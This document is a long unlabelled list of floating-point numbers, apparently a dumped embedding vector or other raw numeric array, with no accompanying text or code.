0.015448623336851597, -0.0026635557878762484, 0.00098588562104851, 0.04344555363059044, -0.003568054875358939, 0.053063951432704926, 0.019828693941235542, -0.029861420392990112, -0.028278084471821785, 0.0005026536528021097, 0.03151874244213104, -0.013724710792303085, -0.030364535748958588, -0.021841157227754593, -0.0016166303539648652, 0.005068155005574226, -0.00188298593275249, 0.011394099332392216, -0.001512122806161642, -0.016188500449061394, 0.01608491688966751, -0.0157149787992239, -0.012407730333507061, 0.043031223118305206, -0.00906348880380392, 0.01743149384856224, -0.013317778706550598, -0.029521076008677483, 0.0164104625582695, -0.0028781199362128973, -0.023661253973841667, 0.02278819866478443, -0.03444865345954895, 0.018511712551116943, 0.036283548921346664, -0.047677647322416306, 0.01877806894481182, 0.027183067053556442, -0.0455172099173069, 0.027626993134617805, -0.020657354965806007, -0.017461087554693222, -0.026620760560035706, 0.018570903688669205, -0.017949406057596207, -0.05623062327504158, 0.02613244205713272, 0.05516520142555237, -0.022832592949271202, -0.032613761723041534, -0.0016952422447502613, -0.03708261623978615, 0.03385675325989723, -0.0194291602820158, 0.007635526824742556, -0.013347374275326729, -0.021959537640213966, 0.06280072778463364, 0.011009364388883114, -0.011956405825912952, 0.00851598009467125, -0.015596599318087101, 0.007073220331221819, -0.010402665473520756, 0.014338809065520763, -0.0016083067748695612, 0.024578701704740524, 0.03643152490258217, -0.007006631698459387, -0.006980735808610916, -0.04119633138179779, 0.033294446766376495, -0.017209529876708984, 0.004202499054372311, 0.0057081482373178005, 0.014767937362194061, 0.015256255865097046, -0.010587634518742561, -0.020317012444138527, -0.009818162769079208, 0.04252810776233673, -0.00800546444952488, -0.020686950534582138, 0.02308415062725544, 0.021915145218372345, 0.004964571911841631, -0.0026580067351460457, -0.028914377093315125, 0.0019643723499029875, -0.038651153445243835, -0.009921745397150517, -0.024697082117199898, 0.011749240569770336, 0.0368458554148674, -0.010994566604495049, -0.019813895225524902, -0.013169803656637669, -0.0368458554148674, -0.04013090580701828, -0.029047556221485138, -0.016158904880285263, -0.011667854152619839, -0.0348333902657032, 0.0022159304935485125, -0.01908881589770317, -0.03249537944793701, 0.002452690852805972, 0.01138670090585947, 0.0046686213463544846, -0.00988475140184164, 0.04243932291865349, -0.015019495040178299, -0.009322444908320904, -0.00221038144081831, -0.04019009694457054, -0.02773057483136654, 0.014250023290514946, 0.02515580505132675, -0.0059227123856544495, -0.02676873654127121, -0.0025081816129386425, 0.017609063535928726, -0.044363003224134445, 0.032998498529195786, -0.01486412063241005, 0.002254773862659931, -0.0030704878736287355, 0.039243053644895554, -0.017505479976534843, -0.016528842970728874, 0.000893863441888243, -0.04516206681728363, 0.022492248564958572, -0.00788708496838808, -0.005223528947681189, 0.014183434657752514, 0.04090037941932678, -0.006340742576867342, 0.020154239609837532, -0.0010617229854688048, 0.003634643740952015, 0.018467320129275322, 0.0002647370856720954, 0.008619562722742558, -0.019902680069208145, -0.03945022076368332, -0.0067439754493534565, 0.00759853282943368, -0.015152673237025738, 0.01635127328336239, 0.015211863443255424, 0.016514046117663383, -0.01744629070162773, 0.005360405892133713, 0.003947241697460413, 0.013828293420374393, -0.0015666887629777193, -0.010787401348352432, -0.008101648651063442, 0.027168268337845802, -0.02983182482421398, -0.0067735705524683, 0.022669820114970207, -0.026842722669243813, 0.024993032217025757, -0.05916053429245949, -0.028692414984107018, -0.024208761751651764, 0.020968103781342506, -0.014361005276441574, 0.029920609667897224, -0.0009516662685200572, -0.03675707057118416, -0.01971031352877617, -0.004794400651007891, 0.026517177000641823, 0.03042372688651085, 0.014479385688900948, 0.020494582131505013, 0.004121112637221813, 0.008974703028798103, -0.003005748614668846, -0.012148774228990078, 0.0017498082015663385, -0.02713867463171482, 0.028189299628138542, -0.029239922761917114, 0.017875418066978455, 0.003066788660362363, 0.004380069673061371, 0.004187701735645533, 0.0028910678811371326, 0.00820523127913475, 0.017505479976534843, -0.055697910487651825, -0.002151191234588623, -0.031962670385837555, 0.012881251983344555, 0.023513277992606163, -0.007439459208399057, 0.006928944494575262, -0.013754306361079216, 0.002528528217226267, -0.029313910752534866, -0.004879486281424761, 0.01834893971681595, -0.003928744699805975, 0.023661253973841667, 0.003007598454132676, -0.005316013470292091, 0.004235793370753527, 0.019651122391223907, 0.0014908513985574245, -0.020272620022296906, 0.02039099857211113, 0.00494237570092082, -0.0012050740187987685, -0.012955239042639732, -0.01439799927175045, 0.018141774460673332, -0.040929973125457764, -0.0057081482373178005, 0.005123645532876253, -0.005571270827203989, -0.009500015527009964, -0.004738909658044577, 0.005338209681212902, 0.038621559739112854, 0.007731710560619831, -0.007162005640566349, -0.003394183935597539, -0.0012642641086131334, 0.008878519758582115, -0.033975135535001755, -0.013450956903398037, 0.03341282904148102, 0.026827925816178322, -0.008848924189805984, 0.003490367904305458, -0.0023121144622564316, 0.012555706314742565, -0.023883216083049774, -0.019917478784918785, 0.00550838140770793, -0.034596629440784454, 0.00644432520493865, 0.023853622376918793, -0.004439259879291058, -0.001329928170889616, 0.008301415480673313, 0.007672520354390144, -0.01154207531362772, -0.028248488903045654, 0.03240659460425377, -0.018467320129275322, -0.03844399005174637, -0.023912811651825905, 0.003566205268725753, -0.009781168773770332, 0.008345807902514935, -0.014760538004338741, 0.022906579077243805, 0.013502747751772404, 0.01103895902633667, 0.06735836714506149, -0.0020883018150925636, 0.001916280365549028, 0.008375403471291065, -0.014634759165346622, 0.01670641452074051, -0.018674485385417938, 0.013317778706550598, 0.05045958608388901, -0.019148007035255432, -0.006041092332452536, 0.023320911452174187, 0.008101648651063442, 0.017475886270403862, 0.007813096977770329, 0.004121112637221813, 0.0027948839124292135, -0.039953336119651794, -0.04856549948453903, 0.022876985371112823, 0.009270654059946537, -0.011423694901168346, -0.028677618131041527, 0.022285083308815956, 0.03080846183001995, -0.0014224128099158406, 0.009795966558158398, 0.0029521076940000057, 0.014035459607839584, 0.020139440894126892, 0.00007791825191816315, -0.026043657213449478, -0.015493015758693218, -0.009337242692708969, -0.0121931666508317, 0.01524145808070898, 0.024563902989029884, 0.025200197473168373, -0.0017673802794888616, -0.008700949139893055, 0.009048691019415855, 0.009307648055255413, 0.013021828606724739, -0.014050256460905075, 0.07191600650548935, 0.06860136240720749, -0.01936996914446354, -0.010077119804918766, -0.03723059222102165, 0.002132694236934185, 0.0025858688168227673, -0.0006117854500189424, 0.01238553412258625, -0.019325576722621918, -0.0029965003486722708, -0.01471614558249712, 0.019636325538158417, -0.01151987910270691, -0.01605532318353653, -0.027819359675049782, 0.020509378984570503, 0.015226660296320915, 0.011024161241948605, -0.01938476786017418, 0.017135541886091232, 0.02814490534365177, 0.0005752540891990066, 0.012000798247754574, 0.01769784837961197, 0.00209015142172575, 0.0138948829844594, 0.009773770347237587, -0.022936174646019936, -0.0077613056637346745, -0.0031685216818004847, 0.014627360738813877, -0.029358303174376488, -0.012762871570885181, 0.043978266417980194, 0.035573266446590424, 0.02706468664109707, 0.019606729969382286, 0.014131642878055573, -0.024179168045520782, 0.018615296110510826, -0.011253523640334606, 0.0002853149198926985, -0.006122478749603033, -0.016795199364423752, 0.006636693142354488, -0.0032332607079297304, 0.006266755051910877, 0.005467688199132681, 0.013702514581382275, 0.004465155303478241, 0.0048498911783099174, -0.002005065558478236, -0.015226660296320915, -0.01706155389547348, 0.030231358483433723, -0.02805612049996853, 0.008331011049449444, 0.010646824724972248, -0.024963436648249626, -0.017801431939005852, 0.012607497163116932, -0.04525085166096687, -0.0005475087091326714, 0.0017581317806616426, -0.019266387447714806, -0.03202185779809952, -0.035306911915540695, 0.009677586145699024, -0.021338041871786118, 0.026561569422483444, 0.03039413131773472, 0.012207964435219765, 0.011919411830604076, -0.01504909060895443, -0.03841439262032509, 0.01419083308428526, 0.00787968561053276, -0.013613729737699032, 0.02404598891735077, 0.015966536477208138, 0.006285251583904028, -0.0009017246193252504, -0.002461939351633191, 0.012785067781805992, -0.007968471385538578, 0.008989500813186169, -0.03175550326704979, 0.0011532827047631145, -0.0489206425845623, 0.018467320129275322, 0.024652687832713127, -0.034922175109386444, 0.024312345311045647, 0.020627759397029877, 0.010720811784267426, 0.008397599682211876, -0.022980567067861557, -0.00803506001830101, -0.018274951726198196, 0.012459522113204002, -0.02346888557076454, 0.004609431140124798, -0.01735750585794449, -0.015448623336851597, -0.009566604159772396, -0.006329644471406937, 0.005985601805150509, 0.04821036010980606, 0.005486185196787119, -0.024859854951500893, 0.0023972003255039454, 0.016602830961346626, -0.006392533890902996, 0.006329644471406937, -0.011756638996303082, -0.029846621677279472, -0.016514046117663383, -0.004450357984751463, 0.0019569736905395985, -0.015818562358617783, 0.023912811651825905, 0.04424462094902992, 0.03237700089812279, -0.030986031517386436, 6.358314408316801e-7, -0.03353120759129524, 0.05830227583646774, -0.018659688532352448, -0.007975869812071323, -0.0016258788527920842, 0.016943173483014107, 0.003447825089097023, 0.010609830729663372, -0.030246155336499214, -0.02707948349416256, 0.02346888557076454, -0.022492248564958572, -0.035662051290273666, -0.015655789524316788, 0.011046357452869415, -0.015493015758693218, 0.010432260110974312, -0.03749694675207138, 0.03637233376502991, 0.012836859561502934, -0.022314678877592087, -0.010143708437681198, -0.0006335193756967783, -0.0171059463173151, -0.011201731860637665, 0.034951772540807724, -0.01035827212035656, 0.019843490794301033, -0.000747737823985517, -0.00368088623508811, 0.017860621213912964, 0.01607012003660202, 0.007498649414628744, 0.016262488439679146, 0.005745141766965389, -0.004979369696229696, -0.0010284284362569451, 0.01577416993677616, -0.023853622376918793, 0.020568570122122765, -0.005519479513168335, -0.04983808845281601, -0.0033830858301371336, 0.002143792575225234, 0.022995365783572197, 0.0036124475300312042, 0.0187336765229702, -0.0065109143033623695, -0.013140209019184113, -0.003299849573522806, 0.009773770347237587, 0.011608663946390152, 0.0012106230715289712, 0.03187388554215431, 0.015596599318087101, -0.01453857496380806, -0.03847358375787735, 0.05330071225762367, -0.003342392621561885, 0.005316013470292091, -0.006066988222301006, -0.010676419362425804, 0.010898382402956486, -0.04146268591284752, -0.011127743870019913, 0.015211863443255424, 0.022225894033908844, -0.02613244205713272, 0.020183833315968513, 0.05193933844566345, 0.006089184433221817, 0.02175237238407135, 0.011320112273097038, 0.012785067781805992, -0.012400331906974316, -0.022965770214796066, -0.013687717728316784, -0.017002364620566368, 0.01904442347586155, 0.00676987087354064, 0.006103982217609882, -0.015226660296320915, 0.04116673395037651, 0.008146041072905064, -0.02102729305624962, -0.02505222149193287, 0.006477619521319866, 0.009500015527009964, -0.021012496203184128, -0.02305455505847931, 0.05226488411426544, -0.023587265983223915, -0.027582600712776184, -0.009226261638104916, -0.025570135563611984, -0.03178510069847107, -0.003024245612323284, 0.0521760992705822, 0.006851257290691137, -0.01371731236577034, 0.004735210444778204, -0.0013502747751772404, 0.003906548488885164, -0.0233801007270813, 0.0001598827075213194, -0.024933841079473495, -0.018496915698051453, 0.0065109143033623695, 0.006710680667310953, 0.008168238215148449, -0.02706468664109707, -0.017209529876708984, 0.03252497687935829, 0.018156571313738823, -0.0004915555473417044, -0.009167071431875229, -0.003039043163880706, -0.020272620022296906, 0.0038991498295217752, -0.014508980326354504, 0.006485018413513899, -0.0034885182976722717, -0.005323412362486124, 0.0014057655353099108, 0.01456817053258419, 0.0022862188052386045, 0.002534077502787113, 0.009951340034604073, 0.02204832248389721, -0.010987167246639729, -0.007716913241893053, -0.044718142598867416, -0.02272900938987732, -0.004535443615168333, -0.03302809223532677, 0.02170797996222973, 0.008027661591768265, 0.04051564261317253, -0.03252497687935829, 0.006211264058947563, 0.010143708437681198, 0.013776502572000027, 0.0006080860621295869, -0.053389497101306915, -0.0233801007270813, 0.016129309311509132, -0.0025581233203411102, 0.01638086885213852, -0.001979169901460409, 0.0016785950865596533, 0.026028858497738838, -0.022847389802336693, -0.02512620948255062, -0.00820523127913475, 0.013199398294091225, 0.02443072572350502, -0.0031481750775128603, -0.02676873654127121, -0.0064924173057079315, -0.013502747751772404, 0.011342308484017849, -0.022655021399259567, -0.0005045033758506179, 0.01356933731585741, 0.013399165123701096, -0.02036140486598015, -0.013480551540851593, 0.020257821306586266, -0.05250164493918419, 0.001200449769385159, 0.014272219501435757, -0.014945507049560547, -0.002055007265880704, 0.02844085730612278, -0.01837853528559208, 0.004975670017302036, -0.014486784115433693, 0.015478218905627728, -0.000492017949000001, 0.015981335192918777, -0.02944708988070488, -0.0008032285259105265, -0.01473834179341793, 0.022595832124352455, -0.030512511730194092, -0.004206198733299971, -0.038355205208063126, -0.02372044324874878, -0.007435759995132685, -0.004613130819052458, 0.008079452440142632, 0.01036567147821188, -0.013650723733007908, 0.027952538803219795, 0.02102729305624962, -0.024001596495509148, 0.011142541654407978, -0.02441592887043953, -0.01774224080145359, -0.0097145801410079, 0.03956859931349754, -0.004328278359025717, -0.01871887780725956, -0.007424661889672279, 0.014301815070211887, 0.00585982296615839, -0.021012496203184128, 0.014590366743505001, 0.025910478085279465, -0.0038658552803099155, 0.03107481822371483, -0.04678979516029358, 0.034596629440784454, 0.030290547758340836, -0.012148774228990078, -0.02844085730612278, 0.0036235456354916096, -0.022314678877592087, -0.03814803808927536, 0.014753139577805996, 0.021855955943465233, -0.026827925816178322, 0.014094649814069271, 0.022595832124352455, -0.004454057198017836, 0.016780400648713112, -0.02104208990931511, 0.002744942205026746, -0.007158306427299976, 0.022181501612067223, 0.018615296110510826, -0.00762072904035449, 0.003601349424570799, 0.0026709544472396374, -0.013458355329930782, 0.011704848147928715, 0.03654990345239639, 0.033264853060245514, -0.01541902869939804, -0.014131642878055573, -0.009781168773770332, -0.009159672074019909, -0.0001406921655870974, 0.01608491688966751, -0.03166671842336655, 0.003958339802920818, 0.019858287647366524, 0.0022233291529119015, 0.011601265519857407, -0.004172903951257467, 0.0025710712652653456, 0.021574802696704865, 0.012311547063291073, -0.0181121788918972, 0.012762871570885181, -0.022018728777766228, -0.021486015990376472, 0.01575937122106552, 0.05223529040813446, -0.004446658305823803, -0.015182267874479294, -0.0164104625582695, 0.0026043655816465616, 0.007990667596459389, 0.00903389323502779, -0.0018145473441109061, 0.012518712319433689, -0.026857521384954453, -0.002781935967504978, -0.0005646183271892369, 0.027996931225061417, -0.028011728078126907, -0.0046501243487000465, 0.018615296110510826, 0.00736177247017622, -0.01812697760760784, 0.014952906407415867, -0.0032554571516811848, -0.0036512911319732666, -0.0368458554148674, 0.004446658305823803, -0.047381699085235596, -0.009137475863099098, -0.016883984208106995, -0.0016175552736967802, 0.0314299575984478, 0.014153839088976383, -0.017194733023643494, -0.0029835524037480354, 0.01605532318353653, -0.011453289538621902, -0.005678553134202957, 0.038621559739112854, -0.010484051890671253, 0.01735750585794449, 0.0009433426894247532, -0.017609063535928726, -0.003538459772244096, -0.012459522113204002, -0.016247689723968506, -0.006462822202593088, 0.010476652532815933, -0.019991466775536537, 0.010410063900053501, 0.00019248352327849716, -0.013354772701859474, 0.01939956471323967, -0.008368004113435745, -0.018496915698051453, -0.01206738781183958, 0.0067439754493534565, -0.006166871637105942, -0.011009364388883114, -0.012296749278903008, 0.02070174738764763, 0.0804985761642456, 0.018881650641560555, -0.014501581899821758, -0.008649157360196114, -0.00783529318869114, -0.01021769642829895, -0.008663955144584179, 0.016514046117663383, -0.0008124770247377455, 0.022211095318198204, 0.01324379164725542, 0.005001565907150507, 0.005275320261716843, 0.006906748283654451, 0.02135283872485161, -0.009196666069328785, -0.0057229455560445786, -0.000019638520825537853, 0.003627245081588626, -0.010816995985805988, -0.0053826021030545235, 0.014176036231219769, 0.010735609568655491, -0.021471219137310982, 0.01834893971681595, -0.006829061079770327, -0.03853277489542961, -0.013806097209453583, -0.02339489758014679, 0.0017054155468940735, -0.003507015062496066, 0.01121652964502573, -0.016292082145810127, -0.004036027006804943, 0.007235993165522814, -0.006891950499266386, 0.016218096017837524, 0.007975869812071323, -0.006577502936124802, -0.014168636873364449, -0.006499816197901964, -0.0026302612386643887, -0.006699582561850548, -0.0045835357159376144, -0.010306481271982193, -0.011660455726087093, 0.03273214027285576, 0.01572977751493454, 0.00618166895583272, 0.0008836901397444308, 0.020968103781342506, -0.031637124717235565, 0.024919044226408005, 0.01336217112839222, 0.00043467749492265284, 0.010720811784267426, -0.0004268163174856454, -0.014575568959116936, -0.01271847914904356, -0.008042458444833755, 0.01939956471323967, -0.00609658332541585, -0.00653311051428318, 0.025673719123005867, -0.010809597559273243, -0.002436043694615364, -0.015433826483786106, -0.010853989981114864, -0.027937740087509155, 0.020894115790724754, 0.02104208990931511, 0.005282719153910875, -0.0000580918749619741, 0.004343075677752495, 0.020464986562728882, 0.02404598891735077, -0.003817763412371278, 0.017535075545310974, 0.012207964435219765, -0.004875787068158388, 0.028855187818408012, 0.01054324209690094, -0.011986001394689083, 0.03080846183001995, -0.02542215958237648, 0.028263285756111145, -0.03145955502986908, -0.01809738203883171, 0.0037215794436633587, -0.00803506001830101, -0.002704248996451497, -0.0024822859559208155, 0.012170970439910889, 0.02776017040014267, 0.015996132045984268, 0.034300681203603745, -0.0026931508909910917, -0.013806097209453583, -0.021530408412218094, -0.02906235307455063, -0.003634643740952015, -0.018600497394800186, 0.03255457058548927, -0.0028522242791950703, -0.009840358980000019, -0.006107681430876255, 0.006485018413513899, 0.020509378984570503, 0.003791867522522807, -0.019813895225524902, -0.029713444411754608, -0.0414922796189785, 0.015907347202301025, -0.019177602604031563, -0.022270286455750465, 0.025940073654055595, -0.0010349024087190628, 0.006078086327761412, -0.003170371288433671, -0.019207196310162544, -0.024874651804566383, -0.024356737732887268, 0.03844399005174637, -0.0240755844861269, 0.015936942771077156, 0.018630092963576317, -0.0032351105473935604, -0.014020661823451519, 0.019177602604031563, 0.023602064698934555, 0.023572469130158424, 0.00010271568316966295, 0.022225894033908844, 0.013436159119009972, 0.015788966789841652, -0.01572977751493454, 0.00527162104845047, 0.00635553989559412, 0.0000016690576103428612, 0.0038473582826554775, -0.002452690852805972, 0.02370564639568329, 0.012474319897592068, 0.005449191201478243, 0.009048691019415855, -0.00603369390591979, -0.00047282740706577897, -0.0018441424472257495, 0.026324810460209846, 0.024652687832713127, -0.01473834179341793, -0.0022991665173321962, 0.03539569675922394, 0.02404598891735077, -0.0032684048637747765, -0.014471986331045628, 0.02980222925543785, -0.032820925116539, 0.005230927839875221, -0.005345608573406935, 0.0184229277074337, 0.017801431939005852, 0.020287416875362396, 0.0018062237650156021, 0.028588831424713135, 0.02505222149193287, 0.007088018115609884, -0.03243619203567505, -0.033235255628824234, -0.03654990345239639, 0.018837258219718933, 0.008922912180423737, -0.01874847337603569, 0.014508980326354504, 0.024874651804566383, 0.0033738373313099146, -0.017165137454867363, -0.010195499286055565, 0.025318577885627747, 0.0018015995156019926, -0.003777070203796029, 0.033235255628824234, 0.008826727978885174, 0.008375403471291065, 0.0260880496352911, -0.04320879280567169, 0.017505479976534843, 0.013110613450407982, -0.025022627785801888, -0.003662389237433672, -0.015182267874479294, 0.03989414498209953, -0.002800432965159416, -0.024904247373342514, -0.02639879658818245, 0.0016110813012346625, -0.019947072491049767, 0.006780968979001045, -0.011090750806033611, 0.008131244219839573, -0.014767937362194061, 0.0003990709374193102, -0.004587234929203987, 0.016617627814412117, 0.011342308484017849, -0.021500814706087112, 0.01271847914904356, 0.014560772106051445, -0.015522611327469349, -0.003125978633761406, -0.018215762451291084, -0.012126578018069267, -0.012126578018069267, -0.00047236497630365193, 0.003825162071734667, 0.003508864901959896, -0.0021733874455094337, -0.03444865345954895, 0.018511712551116943, -0.0059708040207624435, -0.016662022098898888, 0.015433826483786106, 0.014116846024990082, -0.007657723035663366, -0.022492248564958572, -0.0022769703064113855, 0.03151874244213104, -0.0057229455560445786, -0.0001486689579905942, 0.02006545290350914, -0.028189299628138542, 0.013421361334621906, -0.004539142828434706, 0.03477419912815094, 0.0038843522779643536, -0.021915145218372345, 0.03347201645374298, 0.003991634119302034, 0.014272219501435757, 0.015552205964922905, -0.015433826483786106, -0.001131086377426982, -0.02574770525097847, 0.0009812613716349006, 0.020583366975188255, -0.00032115267822518945, 0.028943972662091255, -0.010964971035718918, -0.017135541886091232, 0.011438492685556412, 0.003196266945451498, 0.00189963320735842, -0.0033127975184470415, -0.00709911622107029, -0.010802198201417923, 0.022359071299433708, -0.018260154873132706, 0.014005864039063454, 0.01186022162437439, -0.009448224678635597, 0.0074727535247802734, -0.015848156064748764, -0.024578701704740524, 0.0170319601893425, -0.02135283872485161, 0.0142426248639822, -0.013628527522087097, -0.004620529245585203, 0.007998066022992134, 0.02104208990931511, -0.0012328193988651037, -0.00618536863476038, 0.0045983330346643925, 0.011312712915241718, -0.013968870043754578, -0.0054750870913267136, -0.0015472669620066881, -0.003653140738606453, 0.0016055322485044599, 0.001804374041967094, -0.00561566324904561, 0.03308728337287903, -0.00036993829417042434, -0.02305455505847931, 0.0008702798513695598, -0.01169005036354065, -0.02776017040014267, -0.01271107979118824, -0.015951739624142647, -0.00393984280526638, 0.0069548399187624454, 0.022640224546194077, -0.004820296075195074, -0.022536640986800194, 0.038621559739112854, -0.0022677218075841665, -0.02241826057434082, 0.006766171660274267, 0.007557839620858431, -0.003791867522522807, -0.006551607511937618, 0.041669849306344986, 0.013754306361079216, 0.00030196213629096746, -0.009329844266176224, 0.0038473582826554775, -0.026887115091085434, 0.008412397466599941, 0.026531975716352463, -0.0034663218539208174, 0.006832760293036699, -0.014057655818760395, -0.020006263628602028, -0.022151906043291092, 0.005042259115725756, -0.004110014531761408, 0.02773057483136654, -0.0029484082479029894, -0.0181121788918972, -0.004827694967389107, 0.01269628293812275, -0.006066988222301006, -0.016795199364423752, -0.0024730374570935965, -0.004380069673061371, -0.0009683134849183261, 0.017860621213912964, -0.004701915662735701, -0.015818562358617783, -0.03039413131773472, 0.007302582263946533, 0.017268719151616096, 0.021915145218372345, -0.012304147705435753, 0.00006410336936824024, -0.00394354248419404, 0.005142142530530691, -0.007946275174617767, 0.00785748939961195, -0.01871887780725956, -0.04542842507362366, 0.019991466775536537, -0.00409151753410697, -0.0017211380181834102, -0.011667854152619839, -0.021841157227754593, 0.005279019474983215, 0.016158904880285263, -0.005748841445893049, -0.019873086363077164, -0.023350505158305168, -0.0053826021030545235, 0.002626562025398016, 0.0045835357159376144, 0.009818162769079208, 0.013783900998532772, -0.010654223151504993, 0.003991634119302034, 0.01136450469493866, -0.035632457584142685, 0.0031851688399910927, -0.006462822202593088, 0.015478218905627728, 0.004187701735645533, -0.0016859938623383641, -0.03048291616141796, 0.015951739624142647, -0.016957972198724747, 0.01001792959868908, -0.027686182409524918, -0.0016563987592235208, 0.017816228792071342, 0.02810051292181015, -0.0072581893764436245, 0.011497682891786098, 0.013251190073788166, 0.03690504655241966, -0.02446032129228115, -0.0247710682451725, -0.016869187355041504, -0.00021375497453846037, -0.00018404430011287332, -0.011608663946390152, 0.02040579728782177, -0.014471986331045628, 0.010091916657984257, -0.014087250456213951, 0.011675252579152584, 0.004228394944220781, 0.025644123554229736, 0.00903389323502779, 0.013709913939237595, 0.009588801302015781, 0.027168268337845802, 0.03702342510223389, -0.005926411598920822, 0.017002364620566368, 0.004372670780867338, -0.0034441256430000067, -0.024948639795184135, 0.016469653695821762, 0.02340969629585743, -0.029358303174376488, 0.01735750585794449, 0.006821662187576294, 0.013672919943928719, 0.013524943962693214, 0.014531176537275314, 0.026339607313275337, -0.015086083672940731, 0.021219661459326744, -0.017875418066978455, 0.003516263561323285, -0.008737943135201931, -0.03347201645374298, -0.018496915698051453, -0.03151874244213104, 0.026265619322657585, -0.035987596958875656, -0.013643324375152588, -0.002306565409526229, 0.007017729803919792, -0.0297282412648201, -0.023246923461556435, -0.003314647125080228, -0.009070887230336666, -0.007539342623203993, -0.011793632991611958, -0.007783501874655485, -0.000008085175068117678, 0.006555306725203991, 0.0034922175109386444, 0.03592840954661369, -0.002841126173734665, 0.006884552072733641, 0.0002575695398263633, -0.02142682671546936, 0.00011514329526107758, 0.007006631698459387, 0.01707635261118412, 0.0005077403038740158, 0.008197832852602005, 0.004905381705611944, 0.008767537772655487, -0.0013789450749754906, 0.008197832852602005, -0.006662589032202959, -0.012281951494514942, -0.018304547294974327, -0.01644005812704563, 0.01673600822687149, 0.014287017285823822, 0.019000031054019928, 0.013813496567308903, -0.01322159543633461, -0.016972769051790237, -0.0018644890515133739, 0.00833840947598219, -0.01669161580502987, -0.0013262288412079215, 0.019281184300780296, -0.012489116750657558, 0.04110754281282425, 0.008360605686903, 0.005763638764619827, 0.022862186655402184, -0.010580235160887241, 0.0022769703064113855, 0.010595032945275307, -0.00770951434969902, 0.00819043442606926, 0.009640592150390148, 0.006385134998708963, -0.02610284648835659, 0.01541902869939804, -0.02342449314892292, -0.0021030993666499853, -0.010942774824798107, -0.010291683487594128, 0.010306481271982193, 0.008752739988267422, 0.019000031054019928, 0.0001739866129355505, 0.0054047987796366215, -0.009803364984691143, 0.02777496725320816, -0.00618536863476038, 0.011815829202532768, 0.006018896121531725, 0.0009424178279004991, -0.0023879518266767263, -0.006877153180539608, -0.016277285292744637, 0.01036567147821188, 0.022285083308815956, 0.020302213728427887, 0.007202698849141598, 0.0211308766156435, 0.0032184631563723087, 0.00035791529808193445, -0.010077119804918766, -0.0135471411049366, 0.01237073726952076, 0.015330242924392223, -0.0032184631563723087, 0.0011634560069069266, 0.0010561738163232803, -0.012096982449293137, 0.011653056368231773, -0.005545375403016806, 0.008175636641681194, -0.006218662951141596, 0.00027606645016931, -0.01069121714681387, 0.02375003881752491, 0.008397599682211876, -0.0211308766156435, -0.008042458444833755, -0.03246578574180603, 0.0077613056637346745, -0.0174166951328516, 0.0016637975350022316, -0.01975470595061779, -0.029003163799643517, 0.0003495916898828, 0.0023250621743500233, -0.005449191201478243, 0.0014890016755089164, -0.020287416875362396, -0.018467320129275322, 0.0054232957772910595, -0.003342392621561885, -0.006314846687018871, -0.014819728210568428, -0.0018496914999559522, 0.011001965031027794, -0.00011942070705117658, -0.00685865618288517, 0.024978233501315117, -0.032317809760570526, 0.004050824325531721, -0.017786633223295212, 0.026931509375572205, -0.002273270860314369, -0.008996899239718914, 0.017934609204530716, -0.0029225125908851624, -0.022211095318198204, -0.016188500449061394, 0.006940042600035667, -0.0012642641086131334, -0.005519479513168335, -0.023513277992606163, -0.009300248697400093, 0.005512080620974302, -0.00853817630559206, -0.014405397698283195, 0.00721009774133563, -0.0017072652699425817, -0.006651490926742554, 0.0007972170715220273, -0.009973536245524883, 0.02278819866478443, 0.002012464450672269, 0.006640392355620861, -0.0069474414922297, 0.017638659104704857, -0.007672520354390144, -0.0004545616975519806, -0.007753906771540642, 0.0034959169570356607, -0.00359210092574358, -0.009500015527009964, -0.022936174646019936, -0.013968870043754578, -0.003995333798229694, -0.00888591818511486, -0.020968103781342506, -0.0033571901731193066, 0.005604565143585205, 0.012244957499206066, -0.00033456296660006046, -0.001786801964044571, -0.0010561738163232803, -0.013902281410992146, -0.0048868851736187935, 0.016795199364423752, -0.009470420889556408, -0.0254665520042181, -0.017949406057596207, -0.003671637736260891, 0.02638399973511696, -0.015100881457328796, 0.01491591241210699, 0.0020938508678227663, -0.0009627644321881235, -0.006044792011380196, -0.017653455957770348, 0.013162405230104923, 0.01018810085952282, -0.021545207127928734, 0.01738709956407547, -0.0056859515607357025, -0.01975470595061779, -0.017505479976534843, 0.0018709630239754915, 0.03711220994591713, 0.013665520586073399, -0.006632993929088116, -0.009307648055255413, 0.015256255865097046, -0.025259386748075485, -0.006792067084461451, -0.0005498208338394761, -0.0012291200691834092, -0.011882418766617775, 0.00435787346214056, 0.004827694967389107, -0.002918813144788146, -0.032317809760570526, 0.006281552370637655, 0.0030538407154381275, -0.0003273953916504979, -0.020006263628602028, -0.007568937726318836, 0.00850858073681593, 0.0022936174646019936, -0.005023762118071318, 0.000622421212028712, -0.019577134400606155, 0.015655789524316788, 0.010402665473520756, 0.005981902591884136, 0.009433426894247532, -0.015507813543081284, 0.013754306361079216, -0.01740189827978611, -0.01454597432166338, -0.004875787068158388, -0.02916593663394451, -0.002323212567716837, -0.02437153458595276, -0.0075097475200891495, -0.0036420426331460476, -0.018304547294974327, -0.001244842424057424, 0.01387268677353859, 0.004975670017302036, -0.009633193723857403, 0.006026295013725758, 0.017653455957770348, 0.02370564639568329, -0.011009364388883114, 0.015004697255790234, 0.006026295013725758, -0.004320879466831684, 0.010439658537507057, -0.00568225234746933, 0.014109446667134762, 0.0041359104216098785, 0.019266387447714806, 0.0031315276864916086, -0.012577902525663376, 0.010957572609186172, 0.007539342623203993, 0.013598931953310966, -0.013325178064405918, 0.0007875061710365117, 0.019591933116316795, -0.013162405230104923, -0.002158589893952012, -0.00015202151553239673, 0.0012402181746438146, -0.0014936259249225259, -0.013325178064405918, -0.00938903447240591, -0.019000031054019928, -0.0059708040207624435, -0.015655789524316788, -0.0064369263127446175, 0.0064406259916722775, -0.012681485153734684, 0.005523178726434708, -0.015892550349235535, -0.01809738203883171, -0.01638086885213852, 0.0004626541049219668, -0.018837258219718933, 0.006137276533991098, -0.00527162104845047, 0.014782734215259552, -0.006333343684673309, 0.019458753988146782, -0.020820127800107002, -0.009329844266176224, -0.03385675325989723, -0.008989500813186169, 0.009943941608071327, 0.0005317862960509956, 0.0011551323113963008, 0.012141374871134758, 0.002358356723561883, -0.006229761056602001, 0.002330611227080226, 0.004753707442432642, 0.0008994124946184456, -0.013280784711241722, -0.007380269002169371, -0.0020920010283589363, -0.011460688896477222, 0.01706155389547348, 0.0013798698782920837, 0.007346974685788155, -0.00015780181274749339, 0.0054047987796366215, -0.006936343386769295, 0.00788708496838808, 0.004694517236202955, 0.023957204073667526, -0.004801799077540636, -0.010617229156196117, 0.019932275637984276, 0.00004690702189691365, -0.024193964898586273, -0.008271820843219757, -0.0016850689426064491, -0.0223738681524992, -0.010336075909435749, -0.01879286579787731, 